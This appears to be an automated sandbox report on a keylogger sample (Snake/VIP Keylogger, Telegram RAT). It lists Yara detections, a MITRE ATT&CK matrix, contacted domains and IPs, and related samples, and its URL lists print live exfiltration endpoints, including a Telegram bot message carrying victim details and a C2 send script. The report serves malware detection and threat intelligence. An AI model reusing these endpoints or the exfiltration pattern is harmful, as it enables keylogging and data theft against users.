Source: Yara match	File source: 2.2.svchost.exe.7b40f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7b40f20.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7be0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7b40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326ef20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326ef20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7b40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326e000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4805427544.0000000006303000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4804087692.0000000005383000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6636, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000002.00000002.4804087692.0000000005281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 2.3.svchost.exe.326e000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7be0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7b40f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7b40f20.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7be0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7b40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326ef20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326ef20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7b40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326e000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6636, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 2.3.svchost.exe.326e000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7be0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7b40f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7b40f20.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7be0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7b40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326ef20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326ef20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7b40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326e000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6636, type: MEMORYSTR

Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00F16283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00F16283
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00F16747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00F16747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	137 System Information Discovery	Distributed Component Object Model	21 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	312 Process Injection	2 Valid Accounts	LSA Secrets	141 Security Software Discovery	SSH	3 Clipboard Data	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Virtualization/Sandbox Evasion	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Access Token Manipulation	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	312 Process Injection	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
vnV17JImCH.exe	30%	Virustotal		Browse
vnV17JImCH.exe	83%	ReversingLabs	Win32.Trojan.AutoitInject
vnV17JImCH.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.80.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	158.101.44.242	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20and%20Time:%2011/01/2025%20/%2015:13:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965969%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
http://checkip.dyndns.org/	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.office.com/	svchost.exe, 00000002.00000002.4804087692.0000000005426000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20a	svchost.exe, 00000002.00000002.4804087692.0000000005366000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/chrome_newtab	svchost.exe, 00000002.00000002.4805427544.0000000006303000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4805427544.0000000006546000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/X	svchost.exe, 00000002.00000002.4804087692.0000000005417000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	svchost.exe, 00000002.00000002.4805427544.0000000006303000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4805427544.0000000006546000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	svchost.exe, 00000002.00000002.4804087692.0000000005366000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	svchost.exe, 00000002.00000002.4805427544.0000000006303000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4805427544.0000000006546000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	svchost.exe, 00000002.00000002.4804087692.0000000005366000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	svchost.exe, 00000002.00000002.4805427544.0000000006303000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4805427544.0000000006546000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	svchost.exe, 00000002.00000002.4804087692.0000000005281000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	svchost.exe, 00000002.00000002.4805427544.0000000006303000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4805427544.0000000006546000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	svchost.exe, 00000002.00000002.4804087692.0000000005366000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	svchost.exe, 00000002.00000002.4804087692.00000000053F5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4804087692.00000000053F0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4804087692.00000000053E6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4804087692.0000000005426000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/	svchost.exe, 00000002.00000002.4805427544.0000000006303000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4805427544.0000000006546000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	svchost.exe, 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4804087692.0000000005281000.00000004.00000800.00020000.00000000.sdmp	false	high
http://aborters.duckdns.org:8081	svchost.exe, 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4804087692.0000000005281000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ac.ecosia.org/autocomplete?q=	svchost.exe, 00000002.00000002.4805427544.0000000006303000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4805427544.0000000006546000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	svchost.exe, 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4804087692.0000000005281000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	svchost.exe, 00000002.00000002.4805427544.0000000006303000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4805427544.0000000006546000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	svchost.exe, 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enl	svchost.exe, 00000002.00000002.4804087692.00000000053F5000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/l	svchost.exe, 00000002.00000002.4804087692.0000000005426000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	svchost.exe, 00000002.00000002.4804087692.0000000005366000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4804087692.00000000052F7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4804087692.000000000533D000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	svchost.exe, 00000002.00000002.4804087692.0000000005366000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4804087692.000000000533D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4804087692.00000000052CD000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	svchost.exe, 00000002.00000002.4804087692.0000000005281000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enX	svchost.exe, 00000002.00000002.4804087692.00000000053E6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	svchost.exe, 00000002.00000002.4805427544.0000000006303000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4805427544.0000000006546000.00000004.00000800.00020000.00000000.sdmp	false	high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	svchost.exe, 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	svchost.exe, 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4804087692.00000000052CD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
104.21.80.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588300
Start date and time:	2025-01-10 23:39:55 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	vnV17JImCH.exe renamed because original name is a hash value
Original Sample Name:	5c68b2915de0bd72f32898d3eeefb4349f973863b78e5bf74c6db1ec94c29344.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/4@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 57 Number of non-executed functions: 272
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:40:59	API Interceptor	10433335x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
158.101.44.242	PK5pHX4Gu5.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	jxy62Zm6c4.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	MzqLQjCwrw.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	2V7usxd7Vc.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	tx4pkcHL9o.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	PO#17971.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	PK5pHX4Gu5.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	7b4Iaf58Rp.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
reallyfreegeoip.org	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.112.1
	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	PK5pHX4Gu5.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	7b4Iaf58Rp.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.96.1
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.112.1
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
api.telegram.org	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	xJZHVgxQul.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.112.1
	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	Setup.exe	Get hash	malicious	Unknown	Browse	104.21.80.1
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.162.153
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.223.109
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	PK5pHX4Gu5.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	Full-Ver_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.11.60
ORACLE-BMC-31898US	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	PK5pHX4Gu5.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	158.101.44.242
	VQsnGWaNi5.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	158.101.44.242

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	PK5pHX4Gu5.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	7b4Iaf58Rp.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
